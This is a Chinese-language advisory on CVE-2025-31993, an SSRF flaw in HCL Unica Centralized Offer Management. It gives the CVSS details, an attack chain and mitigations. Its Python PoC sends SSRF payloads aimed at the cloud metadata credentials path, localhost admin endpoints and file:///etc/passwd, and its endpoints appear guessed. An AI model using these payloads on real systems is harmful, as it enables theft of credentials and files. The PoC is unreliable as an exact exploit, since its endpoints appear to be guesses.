CVE-2025-31993：HCL Unica集中式优惠管理SSRF漏洞

漏洞信息

漏洞编号

CVE-2025-31993

漏洞类型

服务端请求伪造（SSRF）

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

HCL Unica Centralized Offer Management

漏洞概述

CVE-2025-31993是HCL Unica Centralized Offer Management（集中式优惠管理）产品中存在的一个服务端请求伪造（Server-Side Request Forgery, SSRF）漏洞。该漏洞于2025年10月12日由HCL公司的产品安全事件响应团队（PSIRT）披露，CVSS 3.1基础评分为3.5分，属于低危级别漏洞。

HCL Unica是IBM旗下后由HCL收购的一款企业级营销自动化平台，被广泛应用于客户关系管理（CRM）和营销活动管理领域。Centralized Offer Management模块负责集中管理和分发营销优惠信息，是企业营销活动中的核心组件。

该漏洞的根本原因在于应用程序对用户输入的验证不充分，攻击者可以通过提交精心构造的恶意输入，利用服务器端应用程序向内部或外部目标发起非预期的HTTP请求。由于该漏洞需要高权限（PR:H）才能利用，且需要用户交互（UI:R），因此其实际危害程度相对有限，但仍可能导致敏感信息泄露和有限的可用性影响。

SSRF漏洞通常允许攻击者利用受信任的服务器作为代理，访问内部网络资源、云元数据服务或其他受限资源。在企业营销环境中，此类漏洞可能被用于探测内网拓扑结构、访问云基础设施元数据，甚至作为进一步攻击的跳板。

技术细节

服务端请求伪造（SSRF）是一种利用服务器端应用程序发起非预期网络请求的安全漏洞。在CVE-2025-31993中，HCL Unica Centralized Offer Management组件未能对用户提供的URL或网络请求参数进行充分的输入验证和过滤。

漏洞原理：
1. Centralized Offer Management组件提供了允许用户输入URL或服务端请求参数的接口功能；
2. 应用程序在处理这些输入时，直接将其用于服务端HTTP请求，而未对目标地址进行白名单校验或协议限制；
3. 攻击者可以构造特殊的URL（如指向内部IP地址、localhost、云元数据服务地址等），使服务器代替攻击者向这些目标发起请求；
4. 服务器获取的响应内容可能返回给攻击者，从而实现内部信息泄露。

利用方式：
- 攻击者需要具备高权限账户访问权限（PR:H），这意味着普通用户无法直接利用此漏洞；
- 需要用户交互（UI:R），可能是通过社会工程学手段诱使管理员点击恶意链接或在管理界面中提交恶意输入；
- 通过构造指向内部资源的URL（如http://169.254.169.254/latest/meta-data/访问云元数据），攻击者可以获取敏感的配置信息；
- 也可以利用此漏洞对内部服务进行端口扫描或访问受限的管理接口。

该漏洞的CVSS向量为AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:L，表明通过网络可利用、攻击复杂度低、需要高权限、需要用户交互、对机密性影响低、对完整性无影响、对可用性影响低。

攻击链分析

STEP 1

步骤1：获取高权限凭证

攻击者首先需要获取HCL Unica Centralized Offer Management的高权限账户凭证。这可能通过钓鱼攻击、凭据填充、社会工程学或利用其他漏洞获取管理员级别访问权限。

STEP 2

步骤2：登录目标系统

使用获取的高权限凭证登录HCL Unica Centralized Offer Management管理界面，建立有效的认证会话。

STEP 3

步骤3：构造恶意SSRF载荷

攻击者精心构造包含恶意URL的请求载荷，目标可能包括内部网络地址、localhost服务、云元数据服务（如AWS的169.254.169.254）或file://协议读取本地文件。

STEP 4

步骤4：提交恶意输入

通过Centralized Offer Management的输入接口（如资源URL、模板URL、回调URL等参数）提交构造好的恶意输入，触发服务端请求伪造。

STEP 5

步骤5：服务器代替攻击者发起请求

应用程序未对输入进行充分验证，直接使用用户提供的URL发起服务端HTTP请求，访问内部受限资源或外部目标。

STEP 6

步骤6：获取响应数据并利用

服务器获取的响应内容返回给攻击者，攻击者可以从中提取敏感信息（如云元数据凭据、内部配置信息），并可能利用这些信息进行进一步的内网渗透和横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-31993 - HCL Unica Centralized Offer Management SSRF PoC
# This PoC demonstrates the SSRF vulnerability by submitting a crafted URL
# to the Centralized Offer Management component.

import requests

# Target server running HCL Unica Centralized Offer Management
TARGET_URL = "https://target-unica-server:8443/unica/offer/centralized"

# Attacker credentials (high privilege required: PR:H)
USERNAME = "admin"
PASSWORD = "password123"

# Session for authenticated requests
session = requests.Session()

def exploit_ssrf():
    """
    Exploit SSRF by submitting a malicious URL through the offer management interface.
    The server will fetch the URL on behalf of the attacker, potentially accessing
    internal resources or cloud metadata services.
    """
    # Step 1: Authenticate to obtain a valid session
    login_payload = {
        "username": USERNAME,
        "password": PASSWORD
    }
    session.post(f"{TARGET_URL}/login", data=login_payload)

    # Step 2: Submit malicious URL through the offer template/resource fetch feature
    # Targeting internal cloud metadata service (AWS example)
    ssrf_payloads = [
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
        "http://localhost:8080/admin/config",
        "http://127.0.0.1:8443/internal/status",
        "file:///etc/passwd",
        "http://internal-service.local:3306/"
    ]

    for payload_url in ssrf_payloads:
        # Step 3: Inject the malicious URL into the offer management request
        offer_payload = {
            "offerName": "TestOffer",
            "offerType": "PROMOTIONAL",
            "resourceUrl": payload_url,  # Vulnerable parameter
            "templateUrl": payload_url,  # Another potential vulnerable parameter
            "callbackUrl": payload_url   # Callback URL parameter
        }

        response = session.post(
            f"{TARGET_URL}/api/offer/create",
            json=offer_payload,
            headers={"Content-Type": "application/json"}
        )

        print(f"[*] Payload: {payload_url}")
        print(f"[*] Status: {response.status_code}")
        print(f"[*] Response: {response.text[:500]}")
        print("-" * 60)

if __name__ == "__main__":
    exploit_ssrf()

影响范围

HCL Unica Centralized Offer Management（具体受影响版本请参考HCL官方安全公告KB0124422）

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）对Centralized Offer Management组件的访问实施严格的访问控制，限制只有必要的管理员才能访问；2）在网络层面配置出站流量规则，阻止应用服务器访问内部网络地址段和云元数据服务地址；3）对所有用户输入的URL实施白名单校验，仅允许预定义的合法目标；4）监控异常的出站网络请求，及时发现潜在的SSRF攻击行为；5）考虑暂时限制Centralized Offer Management的部分远程请求功能，直到补丁应用。